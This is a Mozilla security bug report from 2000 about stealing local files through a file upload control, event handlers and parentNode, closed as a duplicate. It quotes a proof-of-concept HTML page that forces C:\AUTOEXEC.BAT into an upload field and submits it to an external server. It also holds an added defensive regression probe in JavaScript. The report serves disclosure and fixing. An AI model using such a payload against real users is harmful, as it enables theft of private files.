Closed Bug 42515 Opened 25 years ago Closed 25 years ago

Stealing files using event handlers and parentNode

Categories

(Core :: Security, defect, P3)

VERIFIED DUPLICATE of bug 29517

People

(Reporter: security-bugs, Assigned: joki)

Details

(Whiteboard: [nsbeta2+])

Date: Wed, 14 Jun 2000 18:31:31 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

There is a bug in the file upload control, event handlers and parentNode which allows stealing files.
The code is:
---------------------------------------------------------------------------
<HTML>
<TITLE>
Reading C:\AUTOEXEC.BAT
</TITLE>
Reading C:\AUTOEXEC.BAT
<BR>
Move the mouse over the file control.
<BR>
<FORM NAME=F enctype="multipart/form-data" ACTION="http://www.nat.bg/~joro/upload2.cgi" METHOD="POST">
<INPUT TYPE=FILE NAME="B1" ID="B1" onmouseover="event.target.parentNode.value='C:\\AUTOEXEC.BAT';document.forms[0].submit()">
<INPUT TYPE="SUBMIT">
</FORM>
</HTML>
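The testcase above depends on script being able to assign a path to the file upload control. The following regression probe is an added example, not part of the original report and not the patch from bug 29517 (which this page does not show); `probeFileInput`, `FileInputModel` and `legacyInput` are hypothetical names, and the model assumes the present-day HTML Standard rule that a file control's `value` can only be set to the empty string.

```javascript
// Stand-in for <input type=file> following the HTML Standard's "filename"
// mode for .value, so the probe also runs outside a browser (constructed).
class FileInputModel {
  constructor() {
    this.type = "file";
    this.selected = []; // filled only through the picker, never by script
  }
  // Represents the user choosing a file in the browser's own dialog.
  userPicks(name) {
    this.selected = [name];
  }
  get value() {
    return this.selected.length ? "C:\\fakepath\\" + this.selected[0] : "";
  }
  set value(v) {
    if (v === "") { this.selected = []; return; } // clearing is allowed
    const err = new Error("file input value may only be set to ''");
    err.name = "InvalidStateError";
    throw err;
  }
}

// Constructed control that accepts any string, i.e. the behaviour the
// report describes, kept here only as the failing case for the probe.
function legacyInput() {
  return { type: "file", value: "" };
}

// Reports what happened when script tried to point `input` at `path`.
// In a browser, pass a real control: create an input, set type = "file".
function probeFileInput(input, path) {
  const before = input.value;
  try {
    input.value = path;
  } catch (e) {
    return { scriptSet: false, error: e.name, value: input.value };
  }
  // No exception: safe only if the assignment was silently ignored.
  const changed = input.value !== before && input.value !== "";
  return { scriptSet: changed, error: null, value: input.value };
}

function demo() {
  const path = "C:\\AUTOEXEC.BAT"; // path named in the testcase above
  return {
    modern: probeFileInput(new FileInputModel(), path),
    legacy: probeFileInput(legacyInput(), path),
  };
}
```

A control passes when `scriptSet` is `false`, whether the assignment threw or was ignored.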
Nominating nsbeta2.
Status: NEW → ASSIGNED
Keywords: nsbeta2
Target Milestone: --- → M17
I think this is a duplicate of 29517
[nsbeta2+]
Whiteboard: [nsbeta2+]
Tom, here's another one. Looks like a derivative of 29517 - or is it? Does your patch for 29517 fix this one?
Assignee: mstoltz → joki
Status: ASSIGNED → NEW
Depends on: 29517
Yes, it does. I'm going to dupe it. The testcase is slightly different but the bug is the same.

*** This bug has been marked as a duplicate of 29517 ***
Status: NEW → RESOLVED
Closed: 25 years ago
Resolution: --- → DUPLICATE
Marking Verified as a dup.
Status: RESOLVED → VERIFIED